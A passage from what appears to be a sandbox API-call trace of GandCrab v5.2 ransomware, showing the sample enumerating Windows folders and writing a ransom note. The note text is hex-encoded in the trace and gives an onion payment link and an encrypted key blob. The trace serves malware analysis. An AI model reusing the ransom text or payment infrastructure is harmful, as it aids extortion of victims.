lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON" [0094.651] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\" [0094.651] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0094.652] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.652] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.652] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.652] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.652] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.652] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.652] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.652] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.652] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.653] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.653] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\\\TITWMVJL-DECRYPT.txt") returned 81 [0094.653] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\mZwy6pg ON\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\mzwy6pg on\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0094.654] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\